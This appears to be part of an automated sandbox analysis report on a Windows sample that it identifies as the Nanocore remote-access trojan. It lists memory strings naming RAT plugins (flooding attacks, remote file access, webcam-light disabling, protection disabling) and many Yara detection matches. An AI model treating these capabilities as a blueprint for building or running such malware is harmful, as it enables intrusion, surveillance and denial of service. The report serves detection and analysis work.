        Source: bGf2H3tXGg.exe, 00000000.00000002.255989903.00000000029B0000.00000004.00000001.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
        Source: bGf2H3tXGg.exe | String found in binary or memory: NanoCore.ClientPluginHost
        Source: bGf2H3tXGg.exe, 00000003.00000002.493792875.00000000036D7000.00000004.00000001.sdmp | String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
        Source: bGf2H3tXGg.exe, 00000003.00000002.488999685.00000000023D1000.00000004.00000001.sdmp | String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: bGf2H3tXGg.exe, 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmp | String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
        Source: bGf2H3tXGg.exe, 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmp | String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
        Source: bGf2H3tXGg.exe, 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmp | String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
        Source: bGf2H3tXGg.exe, 0000000B.00000002.306005261.00000000029B0000.00000004.00000001.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
        Source: dhcpmon.exe, 0000000C.00000002.311997780.00000000028B0000.00000004.00000001.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
        Source: bGf2H3tXGg.exe, 0000000E.00000002.318707635.00000000024E1000.00000004.00000001.sdmp | String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: dhcpmon.exe, 0000000F.00000002.324052877.0000000002870000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: dhcpmon.exeString found in binary or memory: NanoCore.ClientPluginHost
        Source: dhcpmon.exe, 00000011.00000002.323797763.0000000002561000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.R
untime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: dhcpmon.exeString found in binary or memory: NanoCore.ClientPluginHost
        Source: dhcpmon.exe, 00000016.00000002.339334436.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.R
untime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Yara detected Nanocore RAT
        Source: Yara match, File source: 00000003.00000002.494409950.0000000004E72000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000E.00000002.318797223.00000000034E1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000E.00000002.318707635.00000000024E1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000E.00000002.317545365.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 00000003.00000002.488378947.00000000021D0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000011.00000002.323797763.0000000002561000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 00000011.00000002.323934536.0000000003561000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match, File source: 00000011.00000002.326163063.0000000004A62000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 00000003.00000002.488999685.00000000023D1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 00000016.00000002.338981000.00000000023B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 00000016.00000002.339113549.0000000002432000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 00000016.00000002.339334436.00000000034CC000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000F.00000002.324052877.0000000002870000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 00000016.00000002.339201684.0000000002491000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 00000011.00000002.323984965.000000000359C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000E.00000002.319988300.0000000004A82000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 00000016.00000002.339302702.0000000003491000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 00000011.00000002.323578165.00000000024C0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000B.00000002.306005261.00000000029B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 00000011.00000002.322836165.000000000050C000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match, File source: 00000016.00000002.338373270.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000E.00000002.318495205.0000000000859000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match, File source: 00000003.00000002.485375087.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 00000000.00000002.255989903.00000000029B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000E.00000002.319780906.0000000004960000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000C.00000002.311997780.00000000028B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 00000016.00000002.338595453.00000000005A8000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match, File source: 00000003.00000002.486901430.0000000000658000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match, File source: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 00000003.00000002.493192985.0000000003464000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: 0000000E.00000002.318855204.000000000351C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: Process Memory Space: bGf2H3tXGg.exe PID: 4656, type: MEMORY
        Source: Yara match, File source: Process Memory Space: bGf2H3tXGg.exe PID: 6468, type: MEMORY
        Source: Yara match, File source: Process Memory Space: bGf2H3tXGg.exe PID: 6704, type: MEMORY
        Source: Yara match, File source: Process Memory Space: bGf2H3tXGg.exe PID: 204, type: MEMORY
        Source: Yara match, File source: Process Memory Space: dhcpmon.exe PID: 6212, type: MEMORY
        Source: Yara match, File source: Process Memory Space: dhcpmon.exe PID: 6816, type: MEMORY
        Source: Yara match, File source: Process Memory Space: dhcpmon.exe PID: 6600, type: MEMORY
        Source: Yara match, File source: Process Memory Space: dhcpmon.exe PID: 6752, type: MEMORY
        Source: Yara match, File source: 11.2.bGf2H3tXGg.exe.29c1458.3.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 3.1.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 14.2.bGf2H3tXGg.exe.4960000.9.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 14.2.bGf2H3tXGg.exe.34e5530.5.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 17.2.dhcpmon.exe.3565530.6.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 14.2.bGf2H3tXGg.exe.4960000.9.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 17.2.dhcpmon.exe.35de3de.9.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 22.2.dhcpmon.exe.2430000.4.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 12.2.dhcpmon.exe.28b0000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 15.2.dhcpmon.exe.2870000.3.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 22.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 22.2.dhcpmon.exe.3495530.7.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 17.2.dhcpmon.exe.24c0000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 11.2.bGf2H3tXGg.exe.29b0000.4.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 17.2.dhcpmon.exe.3565530.6.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 17.2.dhcpmon.exe.35e3214.8.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 22.2.dhcpmon.exe.350e3de.10.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 3.2.bGf2H3tXGg.exe.21d0000.3.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 14.2.bGf2H3tXGg.exe.3563214.6.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 12.2.dhcpmon.exe.28c1458.3.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 22.2.dhcpmon.exe.351783d.9.raw.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 14.1.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 14.2.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack, type: UNPACKEDPE
        Source: Yara match, File source: 12.2.dhcpmon.exe.28b0000.4.unpack, type: UNPACKEDPE
